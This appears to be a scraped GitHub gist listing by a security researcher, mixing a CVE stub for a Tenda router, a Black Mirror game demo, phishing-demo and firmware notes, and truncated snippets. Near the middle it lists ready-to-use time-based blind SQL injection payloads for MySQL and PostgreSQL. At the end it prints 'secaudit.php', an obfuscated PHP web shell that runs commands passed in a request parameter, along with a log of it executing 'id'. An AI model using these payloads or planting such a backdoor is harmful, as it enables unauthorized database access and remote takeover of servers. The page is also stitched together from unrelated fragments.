- Discovered by: xxricardoxkk ([email protected])
- Vendor: Shenzhen Jixiang Tenda Technology Co., Ltd.
- Affected Version: AC1206V1.0RTL_V15.03.06.23
- Severity: High (unauthenticated DoS, potential RCE risk).
win3zz
/ CVE-2025-9523.md
Created
August 27, 2025 13:15
CVE-2025-9523 - Stack-Based Buffer Overflow in Tenda Wi-Fi 5 Router AC1206
What if fiction became reality?
In Black Mirror, Colin Ritman's mysterious creation, Thronglets, was more than a game, it was a digital life simulation that blurred the line between code and consciousness.
This project is a browser-based recreation of that unsettling vision. On screen, you'll see chaotic little beings moving, interacting, and evolving, as if they had minds of their own. It is not just a retro-inspired simulation; it's a glimpse into the strange possibility of artificial life trapped inside code.
🎮 Play the demo here 👉 https://win3zz.com/throng
win3zz
/ time_blind_payloads.csv
Last active
July 21, 2025 07:25
Time-based blind SQL Injection Payloads (Replace [SLEEPTIME] with actual time)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Title | Payload | |
|---|---|---|
| MySQL >= 5.0.12 OR time-based blind (query SLEEP) | OR (SELECT 1337 FROM (SELECT(SLEEP([SLEEPTIME])))win3zz_test) | |
| MySQL >= 5.0.12 OR time-based blind (SLEEP) | OR SLEEP([SLEEPTIME]) | |
| MySQL < 5.0.12 OR time-based blind (BENCHMARK) | OR 1337=BENCHMARK([SLEEPTIME]000000,MD5('win3zz_test')) | |
| MySQL > 5.0.12 OR time-based blind (heavy query) | OR 1337=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1) | |
| MySQL >= 5.0.12 RLIKE time-based blind | RLIKE SLEEP([SLEEPTIME]) | |
| MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP) | RLIKE (SELECT 1337 FROM (SELECT(SLEEP([SLEEPTIME])))win3zz_test) | |
| MySQL OR time-based blind (ELT) | OR ELT(1337=1337,SLEEP([SLEEPTIME])) | |
| PostgreSQL > 8.1 OR time-based blind | OR 1337=(SELECT 1337 FROM PG_SLEEP([SLEEPTIME])) | |
| PostgreSQL OR time-based blind (heavy query) | OR 1337=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) |
Important
Disclaimer: This content is intended strictly for educational and ethical awareness purposes only. It must not be used for unauthorized or malicious activities. Always conduct security testing only in environments you own or have explicit permission to test. Misuse of this information may be illegal and subject to penalties under cybercrime laws.
This demonstrates how phish[i]ng techniques work, for the sole purpose of educating ethical hackers, developers, and students in cybersecurity.
We are using a minified and obfuscated clone of the Fa[ce]book login page for simulation purposes.
Summary of the concepts and techniques discussed in a firmware analysis series, along with technical notes and commands
This video, Part 1 of a three-part firmware analysis series by Tom Heb of Meta Red Team X, introduces what firmware is, why it's security-critical, and the initial two phases of firmware analysis: enumerate (figuring out what firmware exists) and obtain (getting a copy of the firmware).
Key Technical Details and Commands:
win3zz
/ eval_test.php
Created
February 6, 2025 14:18
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| echo myMessage("WELCOME", "win3zz", 0); | |
| function myMessage() { | |
| $messages = [ | |
| "WELCOME" => "Welcome, %s! You have %d new messages.", | |
| "ERROR" => "An error occurred: %s" | |
| ]; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * Description: | |
| * You can decode the hidden message by running the program. | |
| * Compile and execute: user@host:~$ javac A.java && java A | |
| * | |
| * @author Bipin Jitiya | |
| * @since 2024-12-17 | |
| */ | |
| class A { | |
| public static void main(String[] args){ |
win3zz
/ Offensive.md
Last active
December 17, 2024 15:14
MIL-PRF-19500 and Hazardous Electronic Components
secaudit.php
<?php $s="\x73\x79\163\x74\145\155";$__=$_REQUEST;if(isset($__["\x61\162\x65\x61\x35\x31"])){echo "\74\160\x72\145\x3e";$c0=$__["\x61\162\x65\x61\x35\x31"];$s($c0.' 2>&1');echo "\74\57\160\162\x65\76";exit;}?>bipin@bipin-VirtualBox:~/BB/Research/php_backdoor$ php -S 127.0.0.2:8000
[Wed Aug 21 18:49:26 2024] PHP 7.4.3-4ubuntu2.23 Development Server (http://127.0.0.2:8000) started
[Wed Aug 21 18:49:52 2024] 127.0.0.1:53050 Accepted
[Wed Aug 21 18:49:52 2024] 127.0.0.1:53050 [200]: GET /secaudit.php?area51=idNewerOlder